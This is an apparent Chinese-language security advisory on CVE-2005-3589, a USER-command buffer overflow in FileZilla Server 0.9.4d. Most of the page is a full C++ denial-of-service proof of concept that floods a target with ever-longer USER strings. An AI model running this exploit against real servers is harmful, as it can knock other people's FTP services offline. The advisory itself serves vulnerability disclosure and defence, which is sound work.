安全研究
安全漏洞
FileZilla FTP Server USER命令超长参数远程缓冲区溢出漏洞
发布日期:2005-11-07
更新日期:2005-11-11
受影响系统:
FileZilla FileZilla Server 0.9.4d描述:
BUGTRAQ ID: 15346
CVE(CAN) ID: CVE-2005-3589
FileZilla FTP Server是一款小型FTP服务程序,可使用在Microsoft Windows操作系统下。
FileZilla FTP Server对畸形用户请求的处理存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
FileZilla FTP Server在处理带有超长畸形参数的USER命令请求时存在缓冲区溢出,攻击者可以通过发送畸形串导致溢出控制服务器。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
FileZillaDoS.cpp
FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen.
Read the disclaimer at http://ingehenriksen.blogspot.com before using.
Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib".
*/
#include "stdafx.h"
#include <iostream>
#include "Winsock2.h"
#define BUFFSIZE 10000
#define ATTACK_BUFFSIZE 5000
using namespace std;
int _tmain(int argc, _TCHAR* argv[])
{
cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl;
cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl;
if (argc!=3) // Exit if wrong number of arguments
{
cerr << "Error: Wrong number of arguments" << endl;
cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl;
cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl;
return (-1);
}
in_addr IPAddressData;
__int64 counterVal;
char* bufferData;
char* attackStringData;
SOCKET sock;
sockaddr_in sinInterface;
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2
if (iResult != NO_ERROR)
{
cerr << "Error: WSAStartup() failed" << endl;
return(-1);
}
int recvRet;
char tmpBuffer[BUFFSIZE];
char tmpAttackBuffer[ATTACK_BUFFSIZE];
tmpAttackBuffer[0] = 'U';
tmpAttackBuffer[1] = 'S';
tmpAttackBuffer[2] = 'E';
tmpAttackBuffer[3] = 'R';
tmpAttackBuffer[4] = ' ';
int i;
int j=5;
for (i=j;i<ATTACK_BUFFSIZE-6;i++)
{
int k;
for(k=j;k<=i;k++)
{
tmpAttackBuffer[k] = 'A';
}
tmpAttackBuffer[k] = '\n';
tmpAttackBuffer[k+1] = '\0';
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ((int)(sock)==-1)
{
cerr << "Error: Could not create socket" << endl;
return(-1);
}
sinInterface.sin_family = AF_INET;
sinInterface.sin_addr.s_addr = inet_addr(argv[1]);
sinInterface.sin_port = htons(atoi(argv[2]));
if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR))
{
int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0);
cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl;
if ( sendResult != SOCKET_ERROR )
{
recvRet = SOCKET_ERROR;
for (int i=0;i<BUFFSIZE;i++)
tmpBuffer[i]=(char)0;
recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 );
if ( recvRet == SOCKET_ERROR )
cerr << "Error: recv() failed" << endl;
else
cout << "Response is: " << endl << tmpBuffer << endl;;
}
else
cerr << "Error: send() failed" << endl;
if (shutdown(sock,0)==SOCKET_ERROR)
cerr << "Error: shutdown() failed" << endl;
}
else
cerr << "Error: connect() failed" << endl;
if (closesocket(sock)==SOCKET_ERROR)
cerr << "Error: closesocket() failed" << endl;
} // End for loop
return 0;
}
建议:
厂商补丁:
FileZilla
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/filezilla/
浏览次数:7416
严重程度:0(网友投票)
绿盟科技给您安全的保障